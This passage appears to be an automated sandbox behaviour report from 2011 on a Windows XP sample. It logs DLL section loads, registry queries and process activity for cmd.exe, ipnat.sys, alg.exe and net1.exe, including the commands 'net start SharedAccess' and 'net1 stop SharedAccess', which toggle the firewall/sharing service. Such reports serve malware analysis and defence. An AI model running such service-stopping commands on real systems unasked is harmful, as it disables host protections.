Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1613735167
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1613781879
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1613898589
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1614037998
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1614193346
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1614371099
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1614578513
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1614608166
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1614637255
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1617031293
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1617332303
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1617359612
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1617560523
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1617609005
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1617649900
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1617727236
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1617879655
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DisableUNCCheck	object name not found	1617988640
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: EnableExtensions	success or wait	1618023925
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DelayedExpansion	object name not found	1618025301
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DefaultColor	success or wait	1618026453
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: CompletionChar	success or wait	1618028528
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: PathCompletionChar	success or wait	1618029711
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: AutoRun	success or wait	1618031004
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DisableUNCCheck	object name not found	1618038991
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: EnableExtensions	success or wait	1618039849
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DelayedExpansion	object name not found	1618040803
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: DefaultColor	success or wait	1618042314
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: CompletionChar	success or wait	1618043120
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: PathCompletionChar	object name not found	1618044130
Key value queried	Path: HKEY_USERS\.DEFAULT\Control Panel\International Name: AutoRun	object name not found	1618046845
Memory allocated	PID: 444 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1618052862
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1618223946
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1618232768
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1618242684
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1618276494
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1618315451
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1618350603
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1618382584
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1618386167
Process created	PID: 1928 Path: C:\WINDOWS\system32\net.exe Cmdline: net start SharedAccess Createflags: suspended	success or wait	1618447252

Analysis File: ipnat.sys PID: 4 Parent PID: -1

Sections

General
Start time:	07:41:18
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\DRIVERS\ipnat.sys
Commandline:	not known
Imagebase:
File size:	152832 bytes
MD5 hash:	CC748EA12C6EFFDE940EE98098BF96BB

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\WINDOWS\AppPatch\drvmain.sdb	generic read	no options		success or wait	1
\Device\Ip	synchronize and generic read and generic write	non directory file		success or wait	1
\Device\Tcp	synchronize and generic read and generic write	non directory file		success or wait	1
\Device\Tcp	generic read	no options	true	success or wait	1
\Device\KsecDD	read data or list directory and write data or add file and append data or add subdirectory or create pipe instance and read ea and write ea and execute or traverse and delete child and read attributes and write attributes and delete and read control and write dac and write owner and synchronize	non directory file		success or wait	1

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
\Device\IPNAT	SymbolicLinkCreate	Symbolic link name: \DosDevices\IPNAT		success or wait	1

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\AppPatch\drvmain.sdb	read	commit	40000	12288	own pid	readonly	success or wait	1

Registry Activities:

Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPNAT\0000\Control	ActiveService	String	IpNat	success or wait	1

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\Setup	Count	success or wait	1
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Control Panel\Desktop	ConfigFlags	success or wait	1
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter	ImagePath	buffer overflow	1
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter	ImagePath	success or wait	1

Driver Activities:

Device created
Device name	Device type	Completion	Count	Source Address
\Device\IPNAT	network	success or wait	1

Chronological sections
Operation	Data	Completion	Time
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\Setup Name: Count	success or wait	1612545910
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Control Panel\Desktop Name: ConfigFlags	success or wait	1612650921
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPNAT\0000\Control Name: ActiveService Type: String Data: IpNat	success or wait	1612674202
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter Name: ImagePath	buffer overflow	1612676697
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter Name: ImagePath	success or wait	1612687085
File opened	Path: C:\WINDOWS\AppPatch\drvmain.sdb Access: generic read Options: no options	success or wait	1612698436
Section loaded	Path: C:\WINDOWS\AppPatch\drvmain.sdb Access: read Type: commit Baseaddress: 40000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1612712183
Device created	Device Name: \Device\IPNAT Device Type: network	success or wait	1612722020
Symbolic link created	Symbolic link name: \DosDevices\IPNAT File path: \Device\IPNAT	success or wait	1612729643
File opened	Path: \Device\Ip Access: synchronize and generic read and generic write Options: non directory file	success or wait	1612731410
File opened	Path: \Device\Tcp Access: synchronize and generic read and generic write Options: non directory file	success or wait	1612738157
File opened	Path: \Device\Tcp Access: generic read Options: no options Attributes: normal Content Overwritten: true	success or wait	1612760561
File opened	Path: \Device\KsecDD Access: read data or list directory and write data or add file and append data or add subdirectory or create pipe instance and read ea and write ea and execute or traverse and delete child and read attributes and write attributes and delete and read control and write dac and write owner and synchronize Options: non directory file	success or wait	1612770062

Analysis File: alg.exe PID: 1204 Parent PID: 668

Sections

General
Start time:	07:41:19
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\alg.exe
Commandline:	not known
Imagebase:	0x1000000
File size:	44544 bytes
MD5 hash:	8C515081584A38AA007909CD02020B3D

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
unknown	unknown	unknown	77C10000	360448	own pid	read write	success or wait	1
C:\WINDOWS\system32\atl.dll	query and write and read and execute	image	76B20000	69632	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\wsock32.dll	query and write and read and execute	image	71AD0000	36864	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
C:\WINDOWS\system32\mswsock.dll	query and write and read and execute	image	71A50000	258048	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	630000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	630000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	630000	618496	own pid	readonly	success or wait	1
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	670000	401408	own pid	execute	success or wait	1
C:\WINDOWS\system32\clbcatq.dll	query and write and read and execute	image	76FD0000	520192	own pid	read write	success or wait	1
C:\WINDOWS\system32\comres.dll	query and write and read and execute	image	77050000	806912	own pid	read write	success or wait	1
C:\WINDOWS\system32\winlogon.exe	write and read and execute	commit	680000	507904	own pid	execute	success or wait	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	680000	2904064	own pid	read write	image not at base	1
C:\WINDOWS\system32\xpsp2res.dll	query and write and read and execute	image	680000	2904064	own pid	read write	conflicting addresses	1
C:\WINDOWS\system32\hnetcfg.dll	write and read and execute	commit	A10000	344064	own pid	execute	success or wait	1
C:\WINDOWS\system32\hnetcfg.dll	query and write and read and execute	image	662B0000	360448	own pid	read write	success or wait	1
C:\WINDOWS\system32\wshtcpip.dll	write and read and execute	commit	A50000	20480	own pid	execute	success or wait	1
C:\WINDOWS\system32\wshtcpip.dll	query and write and read and execute	image	71A90000	32768	own pid	read write	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1617324553
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1617437442
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1617442126
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1617445465
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1617449443
Section loaded	Path: unknown Access: unknown Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1617564893
Section loaded	Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1617767301
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1617795430
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1617806161
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1617939931
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1617953983
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1618031623
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1618061257
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1618155239
Section loaded	Path: C:\WINDOWS\system32\wsock32.dll Access: query and write and read and execute Type: image Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid	success or wait	1618231303
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1618244615
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1618301837
Section loaded	Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid	success or wait	1618354529
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1618527133
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1618560705
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1618600418
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1618605997
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1618637608
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1618669260
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1618703743
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1618734279
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1618751100
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1618763365
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1618777402
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1618821359
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1618873199
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1618944080
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1618962192
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1618981930
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 630000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1621558189
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 630000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1621676432
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1621687497
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1621773648
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1621785487
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1621809445
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1621875149
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 630000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1621988452
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 670000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	1622467858
Section loaded	Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	success or wait	1622550827
Section loaded	Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid	success or wait	1622568871
Section loaded	Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid	success or wait	1623081376
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid	image not at base	1623130944
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid	conflicting addresses	1623133727
Section loaded	Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: A10000 Size: 344064 Protection: execute Mapped to pid: own pid	success or wait	1624253637
Section loaded	Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1624280382
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: A50000 Size: 20480 Protection: execute Mapped to pid: own pid	success or wait	1625213203
Section loaded	Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1625220049

Analysis File: net1.exe PID: 592 Parent PID: 1468

Sections

General
Start time:	07:41:19
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 stop SharedAccess
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
